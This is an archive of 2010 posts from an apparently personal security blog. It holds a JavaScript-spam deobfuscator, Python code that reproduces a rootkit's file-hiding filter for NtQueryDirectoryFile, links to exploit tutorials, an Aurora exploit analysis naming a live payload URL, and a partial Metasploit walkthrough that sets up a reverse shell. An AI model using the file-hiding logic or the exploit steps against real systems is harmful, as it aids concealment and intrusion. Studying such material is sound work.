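```python
"""Added example (not from the original post): static removal of the two
obfuscation layers in the Facebook spam script. Layer 1 is Dean Edwards'
p,a,c,k,e,r output, eval(function(p,a,c,k,e,r){...}('payload',base,count,
'dict'.split('|'),0,{})); layer 2 is a hex-escaped string array (_0x95ea on
the page) used as obj[_0x95ea[n]]. Nothing is eval'd. PACKED_SAMPLE is a
constructed miniature in the same style, not the full spam script."""
import re


def packer_token(c, base):
    """Re-implementation of the packer's e(c): word index -> short identifier."""
    head = "" if c < base else packer_token(c // base, base)
    c %= base
    return head + (chr(c + 29) if c > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[c])


PACKER_CALL = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)")


def unescape_js_single(s):
    """Undo the escapes a single-quoted JS literal carries (backslash, quote)."""
    return re.sub(r"\\([\\'])", r"\1", s)


def unpack_packer(src):
    """Layer 1: rebuild the word table and substitute every word token once,
    exactly as the packer's own decoder does when it runs in a browser."""
    m = PACKER_CALL.search(src)
    if not m:
        raise ValueError("no p,a,c,k,e,r call found")
    payload, base, count = m.group(1), int(m.group(2)), int(m.group(3))
    words = unescape_js_single(m.group(4)).split("|")
    if len(words) != count:
        raise ValueError(f"dictionary has {len(words)} entries, expected {count}")
    # An empty dictionary slot means "the token is its own word" (k[c] || e(c)).
    table = {packer_token(i, base): w or packer_token(i, base) for i, w in enumerate(words)}
    return re.sub(r"\b\w+\b", lambda mo: table.get(mo.group(0), mo.group(0)),
                  unescape_js_single(payload))


ARRAY_DECL = re.compile(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\];?")


def decode_js_string(body):
    """Decode \\xHH, \\uHHHH and simple backslash escapes of a JS string literal body."""
    def repl(mo):
        esc = mo.group(1)
        return chr(int(esc[1:], 16)) if len(esc) > 1 and esc[0] in "xu" else esc
    return re.sub(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)", repl, body)


def resolve_string_array(src):
    """Layer 2: inline the string array so obj[_0x95ea[n]] becomes obj['name']."""
    m = ARRAY_DECL.search(src)
    if not m:
        return src
    name, body = m.group(1), m.group(2)
    table = [decode_js_string(s) for s in re.findall(r'"((?:[^"\\]|\\.)*)"', body)]

    def repl(mo):
        i = int(mo.group(1))
        if i >= len(table):
            raise ValueError(f"{name}[{i}] out of range")
        return "'" + table[i] + "'"
    return re.sub(re.escape(name) + r"\[(\d+)\]", repl, src[:m.start()] + src[m.end():])


def deobfuscate(src):
    return resolve_string_array(unpack_packer(src))


# Constructed sample: the same packer and string-array scheme as the spam script,
# shrunk to three strings. Decodes to d['getElementById']('suggest')['click']();
PACKED_SAMPLE = r'''eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 4=["\\5\\6\\7\\8\\9\\6\\a\\6\\b\\7\\c\\d\\e\\f","\\g\\h\\5\\5\\6\\g\\7","\\i\\9\\j\\i\\k"];l=m;l[4[0]](4[1])[4[2]]();',62,23,'|||var|_0x95ea|x67|x65|x74|x45|x6C|x6D|x6E|x42|x79|x49|x64|x73|x75|x63|x69|x6B|d|document'.split('|'),0,{}))'''

if __name__ == "__main__":
    print(unpack_packer(PACKED_SAMPLE))
    print(deobfuscate(PACKED_SAMPLE))
```

The dictionary-length check matters in practice: a copied sample that was mangled in transit (an HTML editor eating a `<...>` run, as happened to the listing above) fails it immediately instead of producing silently wrong output.<br />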
<br />
<b>@Lucas, if you see this, please check your account and your machine: your account has been used to spread this invitation, and your machine is potentially compromised!</b><br />
<br />
Signing off<br />
~x9090<br />
<br />
<b><span style="font-size: large;">[DOC] Inline Hook NtQueryDirectoryFile</span></b> (2010-04-24)<br />
<br />
<span style="font-size: small;">Hola!</span><br />
<br />
<span style="font-size: small;">There is a lot of sample source code on the Internet about hooking NtQueryDirectoryFile/ZwQueryDirectoryFile to hide files on Windows, but most of it uses a kernel driver. This post uses an inline hook instead of a driver.</span><br />
<br />
<span style="font-size: small;">This is nothing new; it has been discussed all over the Internet and the algorithm has been around for a few years. One of my favourite articles, Holy Father's <a href="http://vxheavens.com/lib/vhf00.html#p31">Invisibility on NT boxes, How to become unseen on Windows NT</a>, digs deeply into several stealth techniques on Windows, one of which is file hiding.</span><br />
<br />
<span style="font-size: small;">A short demo video:</span><br />
<br />
<div style="text-align: center;"><object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/9kyeYjsMx7o&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/9kyeYjsMx7o&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></div><br />
<span style="font-size: small;">The source code can be downloaded <a href="http://en.pudn.com/downloads245/sourcecode/windows/file/detail1141823_en.html">here</a>.</span><br />
<br />
<span style="font-size: small;"><b>Update: [10/05/2010]</b></span><br />
<br />
<span style="font-size: small;">Alternative download link: <a href="http://www.4shared.com/file/7jaxJs2K/inline_hooks_ntquerydirectoryf.html">http://www.4shared.com/file/7jaxJs2K/inline_hooks_ntquerydirectoryf.html</a></span><br />
<br />
<span style="font-size: small;">Please note that the program does not work on Vista/Windows 7. Explorer on Vista and later enumerates directories with <b>FileIdBothDirectoryInformation</b> rather than FileBothDirectoryInformation, so to hide files there the hook must also handle that <b>FileInformationClass</b>; the entry layout differs (FILE_ID_BOTH_DIR_INFORMATION adds a FileId field before FileName), so the file name has to be read at a different offset.</span><br />
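To make that caveat concrete, here is an added example (not the post's downloadable C source) of the entry-removal step the hook performs on the buffer after the real NtQueryDirectoryFile returns, written in Python so it runs anywhere. The offsets come from the ntifs.h structure layouts: FILE_BOTH_DIR_INFORMATION places FileName at byte 94, while FILE_ID_BOTH_DIR_INFORMATION inserts an 8-byte-aligned FileId and places it at byte 104, which is exactly why an XP-only hook hides nothing on Vista. The "hide_" name prefix and the directory listing are constructed for the demo.<br />

```python
"""Added example (not the post's downloadable C source): the entry-removal
step of an NtQueryDirectoryFile hook, applied to the output buffer after the
real call returns, for both information classes Explorer uses. Offsets come
from the ntifs.h layouts; the 'hide_' rule and the listing are constructed."""
import struct

FileBothDirectoryInformation = 3       # FILE_INFORMATION_CLASS values (ntifs.h)
FileIdBothDirectoryInformation = 37

# Common prefix of both structs: NextEntryOffset, FileIndex, six LARGE_INTEGER
# timestamps/sizes, FileAttributes, FileNameLength (bytes), EaSize,
# ShortNameLength (CCHAR) + 1 pad byte, ShortName[12] (WCHAR).
COMMON = "<IIqqqqqqIIIbx24s"                         # 94 bytes
NEXT_ENTRY_OFF, FILE_NAME_LEN_OFF = 0, 60
FILENAME_OFFSET = {
    FileBothDirectoryInformation: struct.calcsize(COMMON),            # 94
    FileIdBothDirectoryInformation: struct.calcsize(COMMON + "xxq"),  # pad to 96, FileId -> 104
}
HIDE_PREFIX = "hide_"                                  # assumption: names to hide


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def filter_dir_buffer(buf, length, info_class):
    """Drop hidden entries from buf[:length] (length = IoStatusBlock.Information).
    Returns (entries_removed, new_length); new_length == 0 means everything was
    hidden and the hook must return STATUS_NO_MORE_FILES (0x80000006)."""
    name_off = FILENAME_OFFSET.get(info_class)
    if name_off is None or length < name_off:
        return 0, length                               # unknown class: pass through
    cur, prev, removed = 0, None, 0
    while True:
        nxt = _u32(buf, cur + NEXT_ENTRY_OFF)
        if nxt and (nxt < name_off or cur + nxt > length):
            break                                      # malformed chain: leave it alone
        name_len = _u32(buf, cur + FILE_NAME_LEN_OFF)
        name = bytes(buf[cur + name_off:cur + name_off + name_len]).decode("utf-16-le")
        if name.lower().startswith(HIDE_PREFIX):
            removed += 1
            if nxt:
                # Not the last entry: slide the rest of the buffer over this one.
                # NextEntryOffset values are relative, so moved entries stay valid.
                buf[cur:length - nxt] = buf[cur + nxt:length]
                length -= nxt
                continue                               # re-examine cur (the former next)
            if prev is not None:                       # last entry: cut the chain here
                struct.pack_into("<I", buf, prev + NEXT_ENTRY_OFF, 0)
            length = cur                               # ...or empty the buffer entirely
            break
        if not nxt:
            break
        prev, cur = cur, cur + nxt
    return removed, length


def build_listing(names, info_class):
    """Constructed stand-in for a kernel-filled buffer: chained, 8-byte aligned."""
    name_off, buf, starts = FILENAME_OFFSET[info_class], bytearray(), []
    for name in names:
        buf += bytes(-len(buf) % 8)                    # kernel aligns entries to 8
        starts.append(len(buf))
        encoded = name.encode("utf-16-le")
        entry = bytearray(name_off) + encoded
        struct.pack_into("<I", entry, FILE_NAME_LEN_OFF, len(encoded))
        buf += entry
    for a, b in zip(starts, starts[1:]):
        struct.pack_into("<I", buf, a + NEXT_ENTRY_OFF, b - a)
    return buf, len(buf)


def list_names(buf, length, info_class):
    """Walk a (filtered) buffer the way a caller would and return the names."""
    name_off, names, cur = FILENAME_OFFSET[info_class], [], 0
    while length:
        name_len = _u32(buf, cur + FILE_NAME_LEN_OFF)
        names.append(bytes(buf[cur + name_off:cur + name_off + name_len]).decode("utf-16-le"))
        nxt = _u32(buf, cur + NEXT_ENTRY_OFF)
        if not nxt:
            break
        cur += nxt
    return names


def demo(info_class):
    """Filter a three-entry listing; exercises both the slide and the cut path."""
    buf, length = build_listing(["hide_rootkit.sys", "notes.txt", "HIDE_config.dat"], info_class)
    removed, length = filter_dir_buffer(buf, length, info_class)
    return removed, list_names(buf, length, info_class)


def xp_hook_on_vista_buffer():
    """The bug the post warns about: XP offsets applied to a FileIdBoth buffer read
    the name from the wrong place (padding + FileId), so nothing is ever hidden."""
    buf, length = build_listing(["hide_rootkit.sys"], FileIdBothDirectoryInformation)
    return filter_dir_buffer(buf, length, FileBothDirectoryInformation)[0]


if __name__ == "__main__":
    for cls in (FileBothDirectoryInformation, FileIdBothDirectoryInformation):
        print("class", cls, "->", demo(cls))
    print("XP-only hook on a Vista buffer hides", xp_hook_on_vista_buffer(), "entries")
```

In the real hook the same three cases apply to the caller's buffer: shift later entries over a hidden one, zero the previous NextEntryOffset when the hidden entry is last, and return STATUS_NO_MORE_FILES when the hidden entry was the only one, updating IoStatusBlock->Information accordingly.<br />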
<br />
<span style="font-size: small;">Signing off.</span><br />
<span style="font-size: small;">@x9090</span><br />
<br />
<b><span style="font-size: large;">[TUTORIAL] Exploit Writing Tutorial From Basic To Advanced</span></b> (2010-03-14)<br />
<br />
An increasing number of bloggers are sharing their knowledge of exploitation, especially on how to write your own exploits.<br />
<br />
In this post I collect the exploit-writing tutorials I have come across. It is not a comprehensive collection, but it is a good starting point for beginners.<br />
<br />
<b><span style="font-size: large;">BASIC</span></b><br />
<br />
David Hoelzer's tutorial, from the <a href="http://www.sans.org/info/35319">SANS Institute</a>, is intended for application/software developers. The presentation explains the basic concept of a buffer overflow, how it occurs, how to exploit it manually, and how to turn the exploit into a Metasploit module so the exploitation process is automated.<br />
<br />
The source code of the vulnerable server can be found on his blog. <br />
<br />
The video tutorials can be downloaded <a href="http://www.4shared.com/file/241025500/93fbec61/Metasploit_Exploit_Creation_St.html">here</a><br />
<br />
-- Reference: <a href="http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html">http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html</a> <br />
<br />
<br />
<b><span style="font-size: large;">INTERMEDIATE</span></b><br />
<br />
I consider this intermediate, as it focuses on exploiting real applications. Lupin from <i>The Grey Corner</i> explains exploitation from basic to intermediate level with step-by-step debugging. Here is the summary:<br />
<ol><li><span style="color: yellow;">Stack Based Windows Buffer Overflow Tutorial</span> - <a href="http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html">http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html</a></li>
<li><span style="color: yellow;">SEH Stack Based Windows Buffer Overflow Tutorial</span> - <a href="http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html">http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html</a></li>
<li><span style="color: yellow;">Windows Buffer Overflow Tutorial: Dealing with Character Translation</span> - <a href="http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html">http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html</a></li>
<li><span style="color: yellow;">Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability</span> - <a href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</a></li>
<li><span style="color: yellow;">Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump</span> - <a href="http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html">http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html</a></li>
</ol><br />
-- Reference: <a href="http://grey-corner.blogspot.com/">http://grey-corner.blogspot.com</a><br />
<br />
<br />
<b><span style="font-size: large;">ADVANCED</span></b><br />
<br />
Peter Van Eeckhoutte (Corelan) was the first to start this kind of exploit-writing tutorial series; at least, his is the most comprehensive guide to exploit development I have seen, and he keeps updating it from time to time.<br />
<br />
<br />
<ol><li><span style="color: yellow;">Exploit writing tutorial part 1: Stack Based Overflows</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 2: Stack Based Overflows - jumping to shellcode</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/">http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 3: SEH Based Exploits</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/">http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 3b: SEH Based Exploits - just another example</span> - <a href="http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/">http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 4: From Exploit to Metasploit - The basics</span> - <a href="http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 5: How debugger modules & plugins can speed up basic exploit development</span> - <a href="http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/">http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR</span> - <a href="http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/">http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 7: Unicode - from 0x00410041 to calc</span> - <a href="http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/">http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 8: Win32 Egg Hunting</span> - <a href="http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/</a></li>
<li><span style="color: yellow;">Exploit writing tutorial part 9: Introduction to Win32 shellcoding</span> - <a href="http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/">http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/</a></li>
</ol><br />
-- Reference: <a href="http://www.corelan.be:8800/">http://www.corelan.be:8800</a><br />
<br />
<br />
If you have any nice exploit tutorials, please feel free to leave a comment here to share with others :)<br />
<br />
Thanks!<br />
<br />
<b>Update:</b><br />
<b>- Part 5 from grey-corner [24/04/2010]</b><br />
<br />
<b><span style="font-size: large;">CVE-2010-0249 - Internet Explorer 6 mshtml.dll Remote Code Execution</span></b> (2010-01-17)<br />
<br />
<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249">CVE-2010-0249</a> is the vulnerability used in the targeted attack on Google: a use-after-free in mshtml.dll, the HTML rendering component of Internet Explorer, which the public exploit targets on IE 6.<br />
<br />
This post demonstrates the recently released Metasploit "Aurora" module (ie_aurora) that implements this exploit.<br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="http://img132.imageshack.us/img132/3274/auroras.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://img132.imageshack.us/img132/3274/auroras.gif" width="400" /></a><br />
</div><br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><br />
I am not able to post the exploit code here; it was probably blocked by Blogger because the shellcode or the JavaScript is detected.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6L7JKaKIsFwZv4Xsq5-CRd6njh8bqoH3U7JwipWNdihQH6NsY2uPhpkB6tPnYQ3iI5YtWQpMmLTc5bV65b4GnP31dXoncbn6r0IYro5jaN29MQdn1i6PQ4K3HRXMJuxyVfzmSEhsJ5NY/s1600-h/xploit_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6L7JKaKIsFwZv4Xsq5-CRd6njh8bqoH3U7JwipWNdihQH6NsY2uPhpkB6tPnYQ3iI5YtWQpMmLTc5bV65b4GnP31dXoncbn6r0IYro5jaN29MQdn1i6PQ4K3HRXMJuxyVfzmSEhsJ5NY/s640/xploit_01.jpg" /></a><br />
</div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4s8XlVNz_eNerueJx7Ep4YlVIRqryfS9fzauFYU0aM3620G41h76wpQ_7suplXRL3kbYsxk-bAOIbGKlTQNExUv2mD58aqTbTlXHyksrNV08KOmLGmD7cs_8vHhUjHLSNlz8NWQORyK67/s1600-h/xploit_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4s8XlVNz_eNerueJx7Ep4YlVIRqryfS9fzauFYU0aM3620G41h76wpQ_7suplXRL3kbYsxk-bAOIbGKlTQNExUv2mD58aqTbTlXHyksrNV08KOmLGmD7cs_8vHhUjHLSNlz8NWQORyK67/s640/xploit_02.jpg" /></a><br />
</div><br />
<br />
The shellcode is obfuscated; I deobfuscated it using HIEW:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa3dNZIKyNDTdu6Xep1hT4gKDXNBfh6eTkWCx3A4nE9p19IIDsFfVzP_ni3cJBpwTBwj16PXLuLQHd9_chO5ayjtYZ-3TqzovKwoLNO7nzz1LiHz6IXsjwdMmX9a5jMovWX-HnGJQWYkQ/s1600-h/decryption_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa3dNZIKyNDTdu6Xep1hT4gKDXNBfh6eTkWCx3A4nE9p19IIDsFfVzP_ni3cJBpwTBwj16PXLuLQHd9_chO5ayjtYZ-3TqzovKwoLNO7nzz1LiHz6IXsjwdMmX9a5jMovWX-HnGJQWYkQ/s400/decryption_01.jpg" /></a><br />
</div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlobv_qfHY62tRlXZbZcpg4lQj1SKnfWNClQf6qIMGQImR5ywgDrM2EgtCcpNnFcsTi4XP2oOYgIA35Pb_Odh6s-TtiDlGuYpZoVFM2iqvRMYOvvzEBBlB9yhCJP__6Wq61r3eLWZ_R5k/s1600-h/decryption_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlobv_qfHY62tRlXZbZcpg4lQj1SKnfWNClQf6qIMGQImR5ywgDrM2EgtCcpNnFcsTi4XP2oOYgIA35Pb_Odh6s-TtiDlGuYpZoVFM2iqvRMYOvvzEBBlB9yhCJP__6Wq61r3eLWZ_R5k/s400/decryption_02.jpg" /></a><br />
</div><br />
The decoded shellcode shows that the payload downloads an additional file from http://demo1.ftpaccess.cc/demo/ad.jpg and then performs further malicious activity with it; the .jpg extension is only a disguise for whatever the stager fetches, so do not expect an image.<br />
<br />
<b><span style="font-size: large;">R</span>eference</b><br />
<br />
[1] <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js">http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js</a> <i>-- Wepawet analysis</i><br />
[2] <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb">http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb</a> <i>-- ie_aurora.rb Metasploit Aurora Exploit Module</i><br />
x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com4tag:blogger.com,1999:blog-1022731470813881575.post-10994919990879992132010-01-15T20:16:00.003+08:002010-01-17T13:20:43.067+08:00[News] Yet Another PDF & IE Attack<b><span style="font-size: large;">Y<span style="font-size: small;">et <span style="font-size: large;">A<span style="font-size: small;">nother <span style="font-size: large;">P</span>DF & <span style="font-size: large;">I</span>E <span style="font-size: large;">A</span>ttack</span></span></span></span></b><br />
<br />
If you have not heard about the recent attacks on Google attributed to China, you might want to read the F-Secure blog, <a href="http://www.f-secure.com/weblog/archives/00001854.html">http://www.f-secure.com/weblog/archives/00001854.html</a>. To summarise the F-Secure post, this is known to be another targeted attack by cybercriminals to obtain intellectual property, in this case sensitive information about Chinese activists.<br />
<br />
This attack is believed to be driven by exploits for 0-day vulnerabilities in various well-known applications such as <a href="http://www.wired.com/threatlevel/2010/01/google-hack-attack/">Adobe Acrobat/Reader</a> and <a href="http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/">Internet Explorer 6, 7 and 8</a>. The exploit drops a DLL component, which is installed as a service and opens a backdoor that lets the remote attacker fully compromise the infected machine. A description of this backdoor can be found on the <a href="http://www.f-secure.com/v-descs/trojan_w32_agent_kog.shtml">F-Secure description page</a> or in <a href="http://blog.threatexpert.com/2010/01/trojanhydraq-exposed.html">Symantec's Trojan.Hydraq</a> write-up.<br />
<br />
SANS also provides an analysis of the PDF exploit, which they call "<a href="http://isc.sans.org/diary.html?n&storyid=7984">PDF Babushka</a>". As a result of this attack, Google has announced that it will stop censoring google.cn; more information can be found at <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html">Official Google Blog: A new approach to China</a>.<br />
<br />
<b>Update (17/01/2010)</b><br />
<br />
Wepawet was the first to release the exploit code for one of the attack vectors used in the targeted attack on Google. The exploit only affects IE 6, which does not have DEP (Data Execution Prevention) enabled, unlike IE 7 on Windows XP SP3 and IE 8.<br />
<br />
Needless to say, IE 6 contains lots of potential 0-day vulnerabilities that have yet to be discovered. For the targeted attacks on Google, there are probably also other 0-day vulnerabilities for IE 7 and IE 8 that have not been revealed yet.<br />
<b><span style="font-size: large;">R</span>eference</b><br />
<br />
[1] <a href="http://isc.sans.org/diary.html?n&storyid=8002">http://isc.sans.org/diary.html?n&storyid=8002</a> -- <i>Exploit code available for CVE-2010-0249</i><br />
[2] <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js">http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js</a> -- <i>Exploit CVE-2010-0249 Source Code</i><br />
[3] <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb">http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb</a> -- <i>Metasploit "Aurora" Module</i><br />
~Signing off<br />
@x9090<br />
<br />
<br />
<br />
<br />
x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-50951062012376536622010-01-09T13:23:00.009+08:002010-06-27T17:54:06.508+08:00CVE-2008-5353 - Old Java Exploit In the Wild
<b><span style="font-size: large;">J<span style="font-size: small;">ava <span style="font-size: large;">C</span>alendar <span style="font-size: large;">D</span>eserialize <span style="font-size: large;">E</span>xploit <span style="font-size: large;"><span style="font-size: small;">I</span></span>n <span style="font-size: large;">T</span>he <span style="font-size: large;">W</span>ild - CVE-2008-5353</span></span></b> <br />
<br />
This is my first post in 2010. Hurray &(^_^)&<br />
Of course this is not good news, as there is a Java exploit in the wild for a vulnerability that is rather old. The vulnerability has been documented as <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353">CVE-2008-5353</a>.<br />
<br />
The exploit uses a Java applet that exploits <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353">CVE-2008-5353</a>. It is not hard to find a PoC (or a real exploit) on the Internet, as it has existed for quite some time. Since <a href="http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize">Metasploit</a> already includes the PoC in the Framework, I will demonstrate it:<br />
<br />
<ol><li>Select the exploit <b>multi/browser/java_calendar_deserialize</b> </li>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg_XPOOLuu8uP_bQUbKCIooXX5SIrx2-gTEpEQRqnV4-nez0bJcNeO27f2W7LnMppWD-ns_3MnmMb5F43ALwKQpzSPBBbS8lGZ3mwIQ6rofRWGgH2sF-jZeys04bw1P1A7lPDuA0O1CFi-/s1600-h/msf_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg_XPOOLuu8uP_bQUbKCIooXX5SIrx2-gTEpEQRqnV4-nez0bJcNeO27f2W7LnMppWD-ns_3MnmMb5F43ALwKQpzSPBBbS8lGZ3mwIQ6rofRWGgH2sF-jZeys04bw1P1A7lPDuA0O1CFi-/s320/msf_1.jpg" /></a> </div>
<li>Set the payload <b>generic/shell_reverse_tcp</b>. <span style="color: red;">NOTE: <b>generic/shell_bind_tcp</b> does not work in this case</span><br />
<br />
<br />
<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfso1F-V7I35en8ee1JpwF8Zy6uvd3_qi_wsJji_u_zaXcy_ZlIMj1kvrgtY3HpODkQaWLfthoEfLtN_WfUOSOAG2_Ih9XMdQ5zwIAHH_1SUCtyMEhRgthl6YezgZW_fKjuiY6garthn-S/s1600-h/msf_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfso1F-V7I35en8ee1JpwF8Zy6uvd3_qi_wsJji_u_zaXcy_ZlIMj1kvrgtY3HpODkQaWLfthoEfLtN_WfUOSOAG2_Ih9XMdQ5zwIAHH_1SUCtyMEhRgthl6YezgZW_fKjuiY6garthn-S/s320/msf_2.jpg" /></a></div> <br />
<br />
</li>
<li>Set the options. <b>URIPATH</b> can be any promising path name ;) <b>LHOST</b> is the attacker's server address:</li>
